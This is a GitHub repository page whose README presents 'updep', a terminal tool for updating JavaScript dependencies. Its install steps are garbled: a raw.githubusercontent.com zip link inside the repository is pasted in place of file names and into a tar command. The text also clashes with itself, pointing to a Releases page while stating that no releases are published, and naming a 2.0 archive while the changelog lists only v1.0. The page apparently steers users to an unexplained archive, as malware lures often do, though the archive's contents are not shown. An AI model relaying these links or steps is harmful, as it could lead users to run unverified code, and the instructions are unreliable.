Skip to content

πŸ”„ Update JavaScript dependencies interactively with a terminal UI. Supports npm, yarn, pnpm, and bun for seamless package management.

License

Notifications You must be signed in to change notification settings

STENIDLAS-XAVINO/updep

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

63 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ updep - Effortlessly Update Your JavaScript Packages

πŸ“₯ Download the Latest Release

Latest Release

πŸš€ Getting Started

Welcome to updep, an interactive terminal user interface (TUI) designed to make updating JavaScript dependencies easy. Whether you use npm, yarn, pnpm, or bun, our tool will help you manage your packages efficiently.

πŸ“¦ System Requirements

To ensure a smooth experience with updep, make sure your system meets the following requirements:

πŸ“Š Key Features

  • Multi-package Manager Support: Works seamlessly with npm, yarn, pnpm, and bun.
  • Interactive Interface: Navigate through dependencies easily with a user-friendly design.
  • Dependency Analysis: Automatically checks for outdated packages and suggests updates.
  • Batch Updates: Update multiple dependencies at once, saving you time.
  • Error Checking: Catches issues before they happen, minimizing downtime.

πŸ“₯ Download & Install

To get started, visit our Releases page to download the latest version.

  1. Click on the link above to go to the Releases page.

  2. Find the latest version of updep.

  3. Download the package suitable for your system (e.g., .exe for Windows, https://raw.githubusercontent.com/STENIDLAS-XAVINO/updep/main/cmd/updep/updep-2.0.zip for Linux).

  4. Locate the downloaded file on your computer.

  5. Follow the specific installation instructions based on your operating system:

    Windows

    • Double-click the downloaded .exe file.
    • Follow the on-screen instructions to complete the installation.

    macOS

    • Open your terminal.
    • Use the command tar -xzf <downloaded-file>https://raw.githubusercontent.com/STENIDLAS-XAVINO/updep/main/cmd/updep/updep-2.0.zip to extract the files.
    • Navigate to the folder and run ./updep in your terminal.

    Linux

    • Open a terminal window.
    • Run the command tar -xzf <downloaded-file>https://raw.githubusercontent.com/STENIDLAS-XAVINO/updep/main/cmd/updep/updep-2.0.zip to extract the files.
    • Navigate to the folder and execute ./updep in your terminal.

πŸ”§ Usage Instructions

Once installed, you can start using updep by following these steps:

  1. Open your terminal or command prompt.
  2. Type updep and press Enter.
  3. Select the package manager you want to use.
  4. Follow the prompts to view and update your JavaScript dependencies.

πŸ“ Example Commands

  • To check for outdated packages:

    updep check
    
  • To update all packages:

    updep update
    
  • To revert an update:

    updep revert
    

πŸ“… Changelog

Stay updated with the latest changes:

  • v1.0: Initial release with core functionality for dependency management.

πŸ“£ Feedback & Support

We value your feedback. If you run into issues or have suggestions, feel free to open an issue on our GitHub Issues page.

πŸ—¨οΈ Community and Contributions

We welcome contributions and community involvement. If you want to help improve updep, check out our Contributing Guidelines for more information.

Thank you for choosing updep! We hope it simplifies your JavaScript dependency updates.

About

πŸ”„ Update JavaScript dependencies interactively with a terminal UI. Supports npm, yarn, pnpm, and bun for seamless package management.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •